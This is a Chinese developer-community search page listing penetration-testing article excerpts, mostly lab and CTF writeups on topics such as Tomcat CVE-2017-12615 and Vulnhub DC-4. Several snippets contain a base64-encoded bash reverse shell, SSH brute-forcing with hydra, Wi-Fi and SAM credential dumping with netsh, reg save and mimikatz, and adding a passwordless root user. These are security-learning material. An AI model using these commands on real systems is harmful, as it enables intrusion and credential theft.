首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏世荣的博客

    渗透测试笔记-4

    反序列化漏洞 1.序列化和反序列化 2.Java WEB中的序列化与反序列化 2.1 对象序列化和反序列化范例 3.Java中执行系统命令 3.1 重写readObject方法 4. 无论是何种类型的数据,最终都会以二进制的形式在网络上传送。发送方需要把这个Java对象序列化;接收方收到数据后把数据反序列化为Java对象。 通常,对象实例的所有字段都会被序列化,这意味着数据会被表示为实例的序列化数据。这样,能够解释该格式的代码就能够确定这些数据的值,而不依赖于该成员的可访问性。 4.Apache Commons Collentions Apache Commons Collections 是一个扩展了Java标准库里集合类Collection结构的第三方基础库,它提供了很多强有力的数据结构类型并且实现了各种集合工具类 (2)再考察应用的Class Path中是否包含Apache Commons Collections库    (3)生成反序列化的payload    (4)提交我们的payload数据

    53330编辑于 2022-03-18
  • 来自专栏ly0n

    Vulnhub渗透测试:DC-4

    前言 过了许久我终于又写了一篇水文,这个DC-4也没什么技术含量,就当在复习下渗透吧 知识点总结,主要考察了三个知识点: 信息收集 hydra爆破ssh密码 teehee提权 信息收集 ​ ,于是就想着去爆破,但是用户名却不知道是哪些,就进行了盲猜,使用burpsuite测试了test test123 admin 成功爆破出admin的密码! hydra爆破ssh密码 ​ 经过信息收集我们已经知道存在三个用户,但是在其他两个用户文件里并没有发现有用的信息,接下来对jim的密码来进行爆破 将jim写入到一个文件中,这里我命名为dc4user ,信息收集阶段发现的Old-passwd文件作为dc4pass。 接下来就是用hydra来进行爆破 hydra -L dc4user -P dc4pass 192.168.1.47 ssh 成功得到密码 image.png 使用ssh连接服务器 进去之后查看另外两个文件

    77040发布于 2021-01-18
  • 来自专栏网络安全攻防

    内网渗透之Wireless凭据窃取

    文章前言 所有Wi-Fi密码及其各自的SSID都存储在以下目录下的XM文件中: C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\***L 凭据窃取 echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear LaZagne LaZagne是一个开源工具,用于检索存储在数据库中的所有密码 ,它可以用于提取WIFI密码信息(需要管理员权限): lazagne.exe wifi Mimikatz 另一种在渗透测试中非常有用的方法是使用Mimikatz,我们可以在后渗透测试阶段通过执行以下命令来获取 utils/wireless_key.html 工具描述:WirelesskeyView是一个简单的软件,用于访问包含无线密码的XML文件并以明文形式显示它们,此工具可用于恢复丢失和遗忘的WIFI密码,在渗透测试中也是一种可选择的凭据获取方法 ,例如:数据库信息、应用信息(向日葵、Teamview、FlashXP等)、主机散列、用户密码等等,后续有时间再逐一介绍

    1.1K10编辑于 2022-09-07
  • 来自专栏白安全组

    内网渗透小技巧——令牌 窃取

    首先我们的环境是,我们已经将我们的msf木马放置到目标机器中去,准备进一步提权。

    37010编辑于 2023-11-29
  • 来自专栏全栈程序员必看

    常用渗透测试工具(数据渗透测试)

    500.19 服务器错误:该文件的数据在配置数据库中配置不正确。 添加成功后点击左上角的 start attack 开启爆破 状态变成 finished 表示 爆破结束,点击 length 查看长度不一样的 rayload ,这里发现密码为 123456,返回登录框测试密码是否正确

    1.9K10编辑于 2022-08-01
  • 来自专栏漏洞知识库

    内网渗透之各种密码凭证窃取 - 渗透红队笔记

    第一章:信息搜集 目标资产信息搜集的程度,决定渗透过程的复杂程度。 目标主机信息搜集的深度,决定后渗透权限持续把控。 渗透的本质是信息搜集,而信息搜集整理为后续的情报跟进提供了强大的保证。 ----Micropoor 密码窃取 注册表读取密码 ---- 注册表读取密码主要获取的是两个文件: reg save HKLM\SYSTEM Sys.hiv reg save HKLM\SAM Sam.hiv 然后再通过mimikatz读取: 08或者08以下的机器读取的是明文密码:测试机器是Windows server 2008 mimikatz.exe "sekurlsa::minidump lsass.dmp 每个软件都使用不同的技术(明文,API,自定义算法,数据库等)存储其密码。开发该工具的目的是为最常用的软件找到这些密码。 域里面存在域控制器的c:\windows\ntds\ntds.dit中 ntds.dit其实就是一个esent数据库,微软本身就有一系列的文档化api能够操作这个数据库。

    3K30发布于 2020-11-25
  • 来自专栏渗透测试专栏

    渗透测试信息收集技巧(4)——Google Hacking

    本文档所提供的信息仅用于教育目的及在获得明确授权的情况下进行渗透测试。任何未经授权使用本文档中技术信息的行为都是严格禁止的,并可能违反《中华人民共和国网络安全法》及相关法律法规。

    93120编辑于 2024-09-26
  • 来自专栏世荣的博客

    渗透测试系统学习-Day4

    = 赋值 == 比较 === 强比较 如果网页出现乱码,加上: <meta charset='UTF-8'> 或者 <meta charset='GBK'> image.png image.png 数据库简单的几个命令 databases; use "库名"; show tables; desc uesr; select 字段名 from 表名; insert into dou_admin value(1,2,3,4,5,6,7,8

    28110编辑于 2022-03-10
  • 来自专栏FreeBuf

    渗透测试 | Tomcat渗透

    Tomcat渗透 Tomcat任意文件写入(CVE-2017-12615) 影响范围 Apache Tomcat7.0.0-7.0.81(默认配置) 复现 这边我用vulhub sudo service 当开发人员开发完毕时,就会将源码打包给测试人员测试测试完后若要发布则也会打包成War包进行发布。 前者定义了 Tomcat启动时涉及的组件属性,其中包含两个connector(用于处理请求的组件) 如果开启状态下,tomcat启动后会监听8080、8009端口,它们分别负责接受http、ajp协议的数据 bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3NS4xOTEvODg4OCAwPiYx}|{base64,-d}|{bash,-i} 最终的 java.io.InputStream in = Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3NS4xOTEvODg4OCAwPiYx

    7K20发布于 2021-07-28
  • 来自专栏谢公子学安全

    渗透测试 | 渗透测试之信息收集

    渗透测试之信息收集 目录 信息收集 域名信息的收集 公司敏感信息网上搜集 网站指纹识别 整站分析 服务器类型(Linux/Windows) 网站容器(Apache/Nginx/Tomcat/IIS) 脚本类型 信息收集 信息收集对于渗透测试前期来说是非常重要的,因为只有我们掌握了目标网站或目标主机足够多的信息之后,我们才能更好地对其进行漏洞检测。 接下来,我就给大家整理了一下,渗透测试中常见的一些需要收集的信息。 传送门——> Github搜索语法 网站指纹识别 在渗透测试中,对目标服务器进行指纹识别是相当有必要的,因为只有识别出相应的Web容器或者CMS,才能查找与其相关的漏洞,然后才能进行相应的渗透操作。 对于单独网站的渗透测试,C段扫描意义不大。

    4.1K11编辑于 2022-01-19
  • 来自专栏啄木鸟软件测试

    渗透测试入门 —— 渗透测试笔记

    来源:http://www.uml.org.cn 0x00 前言 本题算是一道较为综合的渗透题,要求对两个服务器系统进行渗透,这两个 CMS 同样能在网上找到许多漏洞,常用作渗透测试的练习靶机。 注意到数据库配置信息中是根用户权限,因此若能连上 DEDECMS 在 172.16.12.3 上的数据库,那么 Discuz! 在 172.16.12.3 上的数据库也能被访问到! 最终我们在 ultrax 数据库的 pre_ucenter_members 表中发现了 salt 字段的值为 9b47b6: ? 到此为止,本次渗透测试的指定任务已达成。 在此过程中,我同样也受益匪浅,细心的读者会发现全文多次出现『搜索』二字,而渗透测试的核心正是收集目标系统的信息,挖掘其漏洞并加以利用。 星云测试 http://www.teststars.cc 奇林软件 http://www.kylinpet.com 联合通测 http://www.quicktesting.net

    4.6K20发布于 2019-12-12
  • mssql数据渗透测试

    mssql数据渗透测试 任务环境说明: 服务器场景操作系统:Back Track five(用户名:root;密码:toor) 服务器场景操作系统:Microsoft Windows2003 Server BT5对服务器场景server2003进行系统服务及版本扫描渗透测试,并将该操作显示结果中数据库服务对应的服务端口信息作为FLAG提交; 再次使用题目提到的参数-p 1433,3306,80进行扫描 Flag :1433/tcp 3.在本地PC渗透测试平台BT5中使用MSF中模块对其爆破,使用search命令,并将扫描弱口令模块的名称作为FLAG提交; 使用命令打开metasploit渗透测试平台 使用命令search 来查找漏洞利用模块 Flag: auxiliary/scanner/mssql/mssql_login 4.在上一题的基础上使用命令调用该模块,并查看需要配置的信息(使用show options命令), 经过一段时间的等待成功破解出服务器mssql数据密码 Flag:3ab1c2 7.在msf模块中切换新的渗透模块,对服务器场景server2003进行数据库服务扩展存储过程进行利用,将调用该模块的命令作为

    25610编辑于 2025-10-23
  • 来自专栏vulnhub DC 1-9

    VulnHub DC-4 靶机渗透测试笔记

    VulnHub DC-4 靶机渗透测试笔记靶机信息• 靶机名称:DC-4• 靶机来源:VulnHub• 目标:获取 root 权限,找到最终 flag• 难度:⭐⭐⭐☆☆(中等)• 涉及技术:信息收集、 | base64 -d | bashURL 编码版本: 1 echo%20YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xOTIuMTY4LjE2OC4xMjgvNTY3OCAwPiYx %20%7C%20base64%20%2Dd%20%7C%20bashKali 监听: 12 nc -lvnp 5678成功监听到:五、后渗透信息收集5.1 查看基础信息5.2 7.2 查看邮件看一下之前打不开的 mbox:去邮箱里找,之前找到过 exim4 服务:Debian-exim:x:108:112::/var/spool/exim4:/bin/false/var/spool passwd这行意思是添加一个**没有密码、UID 为 0(root权限)**的用户 hack,然后: 123 su hackwhoami # root成功拿到 flag:九、渗透流程总结

    12900编辑于 2026-03-06
  • 来自专栏sofu456

    渗透测试

    SYN/ACK---ACK 3.四次握手 ACK/FIN---ACK---ACK/FIN---ACK 4. blog.51cto.com/414605/760724 wireshark io graph: http://blog.jobbole.com/70929/ 2.metasploit 1.渗透测试 metasploit几乎包含了渗透测试所有的工具,涉及渗透测试7个阶段。 前期交互阶段:与客户讨论并确定渗透测试的范围和目标 情报搜集阶段:采取各种手段搜集被攻击者的有用信息 威胁建模阶段:通过搜集的情报信息, 标识目标系统可能存在的安全隐患 让目标系统发挥更大的价值 书写渗透报告阶段:撰写渗透报告 使用元编程:metaprogramming语言自身作为程序数据输入的编程思想。

    3.4K30发布于 2019-07-09
  • 来自专栏网络安全攻防

    【Web渗透渗透测试简介

    ,并以此来规避被恶意攻击者入侵的可能性 基本分类 渗透测试的类型主要有以下三种: 黑盒测试 黑盒测试(Black-box Testing)也被称为外部测试(External Testing),采用这种方式时渗透测试团队将从一个远程网络位置来评估目标网络基础设施 ,在采用灰盒测试方法的外部渗透测试场景中,渗透测试者也类似地需要从外部逐步渗透进入目标网络,但是他所拥有的目标网络底层拓扑与架构将有助于更好地决策攻击途径与方法,从而达到更好的渗透测试效果 测试流程 PTES )阶段,渗透测试团队与客户组织通过沟通需要对渗透测试的范围、渗透测试的方法、渗透测试的周期以及服务合同细节进行商定,该阶段通常会涉及收集客户需求、准备测试计划、定义测试范围与边界、定义业务目标、项目管理与规划等活动 ,渗透攻击可以利用公开渠道可获取的渗透代码,但一般在实际应用场景中渗透测试者还需要充分地考虑目标系统特性来定制渗透攻击,并需要挫败目标网络与系统中实施的安全防御措施才能成功达成渗透目的,在黑盒测试中,渗透测试者还需要考虑对目标系统检测机制的逃逸 ,从而避免造成目标组织安全响应团队的警觉和发现 后渗透的阶段 后渗透攻击(PostExploitation)整个渗透测试过程中最能够体现渗透测试团队创造力与技术能力的环节、前面的环节可以说都是按部就班地完成非常普遍的目标

    2.8K40编辑于 2023-03-29
  • 来自专栏全栈程序员必看

    socks4代理网络渗透测试实验

    实验目的:利用代理功能对2层网络进行渗透 测试靶机 ubantu 192.168.31.207 192.168.1.129 ubantu 192.168.1.100 /elf 成功获得一个会话连接 添加一个路由 run autoroute -s 192.168.1.0/24 本地设置socks4代理 use auxiliary/server/ socks4a set SRVPORT 9999 开启新的终端 编辑 vim /etc/proxychains.conf 将设置的socks4添加进末尾 代理打开firefox 访问 PHP,php3 添加新文章上传php大马 直接拖拽成功上传后,可以查看路径,直接访问地址 由于msf的路由功能不稳定,所以代理得到的会话很不稳定,并且没有重新连接的功能,所以做内网渗透的时候还是尽量使用稳定的代理工具

    86110编辑于 2022-07-02
  • 来自专栏全栈程序员必看

    渗透测试流程包括_渗透测试包含哪些内容

    目录 渗透测试步骤 步骤一:明确目标 步骤二:信息收集 步骤三:漏洞探索 步骤四:漏洞验证 步骤五:信息分析 步骤六:获取所需 步骤七:信息整理 步骤八:形成报告 # 流程总结 面试补充说明 渗透测试步骤 渗透测试与入侵的区别: 渗透测试:出于保护的目的,更全面的找出目标的安全隐患。 入侵:不择手段的窃取或取得目标的最大权限并予以控制。(是具有破坏性的) 步骤一:明确目标 1、确定范围:规划测试目标的范围,以至于不会出现越界的情况。 2、确定规则:明确说明渗透测试的程度、时间等。 3、确定需求:渗透测试的方向是web应用的漏洞?业务逻辑漏洞?人员权限管理漏洞?还是其他,以免出现越界测试。 ,进行攻击 2、获取内部信息:基础设施(网络连接,vpn,路由,拓扑等) 3、进一步渗透:内网入侵,敏感目标 4、持续性存在:一般我们对客户做渗透不需要,但真实的环境中,我们会做rookit、后门,添加管理账号

    3.1K11编辑于 2022-11-15
  • 来自专栏全栈程序员必看

    Kali Linux渗透测试技术详解_渗透测试入门

    Kali Linux是做渗透测试用的 2. 安装VMware Workstation虚拟机 3. 安装kali-linux系统 4. Kali Linux是做渗透测试用的 渗透测试是通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法,这个过程包括对系统的任何弱点、技术缺陷或漏洞的主动分析。 相比较而言,通常评估方法对评估结果更具有全面性,而渗透测试更注重安全漏洞的严重性。 渗透测试有黑盒和白盒两种测试方法。黑盒测试是指在对基础设施不知情的情况下进行测试。 白盒测试是指在完全了解结构的情况下进行测试。不论测试方法是否相同,渗透测试通常具有两个显著特点: 渗透测试是一个渐进的且逐步深入的过程。 渗透测试是选择不影响业务系统正常运行的攻击方法进行的测试。 它预装了许多渗透测试软件,包括nmap端口扫描器、Wireshark(数据包分析器)、John the Ripper(密码激活成功教程)及Aircrack-ng(一套用于对无线局域网进行渗透测试的软件)

    5.7K20编辑于 2022-09-22
  • 来自专栏全栈程序员必看

    drozer 渗透测试_什么是渗透

    一、环境准备 1、python27环境,一定要官网下载 python2.7下载地址 2、安卓模拟器(我用的夜深,其他应该也可以),或者一台安卓真机 3、java环境 Java下载地址 4、ADB,​ pyopenssl、Twisted、service_identity pip安装即可,如下: python -m pip install pyopenssl 3、电脑下载drozer,下载链接 4、 6、到这一步安装完成 7、下载drozer-agent.apk,这是安装在测试手机端的,下载地址:drozer-agent下载 可以直接拖到模拟器安装,也可以使用adb安装,参考abd使用 ​ 控制台中要进入到该目录下,再执行命令 3、先使用adb连接手机或者模拟器(因为我用的夜深模拟器,它默认端口是62001,其他模拟器的自行查一下,真机的话用usb连接就可以,进入到调试模式) 4

    2.2K10编辑于 2022-09-22
  • 来自专栏安全漏洞环境学习

    渗透测试靶机Lampiao渗透WriteUp

    e8:88:f2:2d:d0:b2:54:0b:9c:ad:61:33:59:55:93 (RSA) | 256 ce:63:2a:f7:53:6e:46:e2:ae:81:e3:ff:b7:16:f4: x20\|_\|"); MAC Address: 00:0C:29:26:BB:D7 (VMware) Device type: general purpose Running: Linux 3.X|4. X OS CPE: cpe:/o:linux:linux_kernel:3cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Uptime guess

    2.6K20发布于 2019-09-24
领券